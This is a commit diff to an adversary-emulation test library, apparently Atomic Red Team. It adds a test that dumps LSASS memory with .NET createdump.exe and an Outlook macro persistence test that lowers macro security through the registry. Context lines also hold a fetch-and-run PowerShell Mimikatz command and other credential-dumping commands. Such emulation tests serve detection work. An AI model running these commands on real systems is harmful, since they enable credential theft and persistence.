T1137 and t1003.001 (#1426)

* Add a test for T1003.001 and T1137

* Fix some errors in T1003.001

* Update spacing

atomics/T1003.001/T1003.001.yaml

@@ -243,6 +243,7 @@ atomic_tests:
       pypykatz live lsa
     name: command_prompt
     elevation_required: true
+
 - name: Dump LSASS.exe Memory using Out-Minidump.ps1
   auto_generated_guid: 6502c8f0-b775-4dbd-9193-1298f56b6781
   description: |
@@ -297,6 +298,7 @@ atomic_tests:
       del "#{output_file}" >nul 2> nul
     name: command_prompt
     elevation_required: true
+
 - name: Powershell Mimikatz
   auto_generated_guid: 66fb0bc1-3c3f-47e9-a298-550ecfefacbc
   description: |
@@ -315,4 +317,40 @@ atomic_tests:
     command: |
       IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
     name: powershell
-    elevation_required: true
+    elevation_required: true
+    
+- name: Dump LSASS with .Net 5 createdump.exe
+  auto_generated_guid: 9d0072c8-7cca-45c4-bd14-f852cfa35cf0
+  description: |
+    This test uses the technique describe in this tweet 
+    (https://twitter.com/bopin2020/status/1366400799199272960?s=20) from @bopin2020 in order to dump lsass
+  supported_platforms:
+  - windows
+  input_arguments:
+    output_file:
+      description: Path where resulting dump should be placed
+      type: Path
+      default: C:\Windows\Temp\dotnet-lsass.dmp
+    createdump_exe:
+      description: Path of createdump.exe executable
+      type: Path
+      default: 'C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.0.3\createdump.exe'
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Computer must have createdump.exe from .Net 5
+    prereq_command: |
+      if (Test-Path '#{createdump_exe}') {exit 0} else {exit 1}
+    get_prereq_command: |
+      echo ".NET 5 must be installed manually." "For the very brave a copy of the executable can be found here: https://github.com/Scoubi/RedTeam-Tools/blob/main/createdump.exe"
+  executor:
+    command: |
+      echo "Createdump Path #{createdump_exe}"
+      $LSASS = tasklist | findstr "lsass"
+      $FIELDS = $LSASS -split "\s+"
+      $ID = $FIELDS[1]
+      & "#{createdump_exe}" -u -f #{output_file} $ID
+    cleanup_command: |
+      del #{output_file}
+    name: powershell
+    elevation_required: true  

atomics/T1137/T1137.yaml

@@ -0,0 +1,22 @@
+attack_technique: T1137
+display_name: Office Application Startup'
+atomic_tests:
+- name: Office Application Startup - Outlook as a C2
+  auto_generated_guid: bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c
+  description: |
+    As outlined in MDSEC's Blog post https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/ 
+    it is possible to use Outlook Macro as a way to achieve persistance and execute arbitrary commands. This transform Outlook into a C2.
+    Too achieve this two things must happened on the syste
+    - The macro security registry value must be set to '4'
+    - A file called VbaProject.OTM must be created in the Outlook Folder.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /t REG_DWORD /d 4
+      if not exist  %APPDATA%\Microsoft\Outlook ( md %APPDATA%\Microsoft\Outlook\ )
+      echo "Atomic Red Team TEST" > %APPDATA%\Microsoft\Outlook\VbaProject.OTM
+    cleanup_command: |
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /f
+      del %APPDATA%\Microsoft\Outlook\VbaProject.OTM
+    name: command_prompt